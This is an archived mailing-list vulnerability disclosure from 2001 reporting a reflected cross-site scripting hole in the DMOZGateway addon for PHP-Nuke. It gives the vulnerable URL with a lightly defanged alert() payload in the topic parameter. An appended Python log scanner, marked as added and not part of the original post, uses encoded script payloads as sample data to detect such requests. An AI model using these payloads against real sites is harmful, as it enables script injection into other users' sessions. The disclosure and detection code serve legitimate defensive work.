New hole in a phpnuke addon.

The concerned addon is DMOZGateway. It allows searching the web via the dmoz.org site.

The addon's URL is the following one:

/modules.php?op=modload&name=DMOZGateway&file=index

The cross site scripting hole is:

/modules.php?op=modload&name=DMOZGateway&file=index&topic=<sc*ript>alert(document.domain)</sc*ript><sc*ript>alert(/test/)</sc*ript>

(without the '*')

frog-m@n
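
Added example, not part of the original post: a Python check a defender could run over web-server access logs to find requests that put HTML markup into the topic parameter of the DMOZGateway module, including percent-encoded and double-encoded forms. The log lines, the log format and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Dec/2001:10:00:01 -0800] "GET /modules.php?op=modload&name=DMOZGateway&file=index&topic=Computers HTTP/1.0" 200 5120',
    '192.0.2.11 - - [16/Dec/2001:10:00:07 -0800] "GET /modules.php?op=modload&name=DMOZGateway&file=index&topic=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.0" 200 5344',
    '192.0.2.12 - - [16/Dec/2001:10:00:09 -0800] "GET /modules.php?op=modload&name=DMOZGateway&file=index&topic=%253CScRiPt%253Ealert(1)%253C/script%253E HTTP/1.0" 200 5344',
    '192.0.2.13 - - [16/Dec/2001:10:00:12 -0800] "GET /modules.php?op=modload&name=News&file=index&topic=%3Cb%3E HTTP/1.0" 200 2048',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP_RE = re.compile(r'[<>"]')  # characters a topic name should never contain


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded markup is also seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_topic(line):
    """Return the decoded topic value if the line is a DMOZGateway request
    whose topic parameter carries HTML metacharacters, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group(1))
    params = parse_qs(parts.query, keep_blank_values=True)
    if not parts.path.endswith("/modules.php") or "DMOZGateway" not in params.get("name", []):
        return None
    for raw in params.get("topic", []):  # parse_qs has already decoded once
        topic = fully_decode(raw)
        if MARKUP_RE.search(topic):
            return topic
    return None


def scan(lines):
    return [(n, t) for n, line in enumerate(lines, 1) if (t := suspicious_topic(line))]


if __name__ == "__main__":
    for lineno, topic in scan(SAMPLE_LOG):
        print(f"line {lineno}: topic={topic!r}")
```

The fourth sample line is ignored because it targets a different module; widen the name check if other modules reflect the same parameter.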
This archive was generated by hypermail 2b30 : Sun Dec 16 2001 - 10:03:42 PST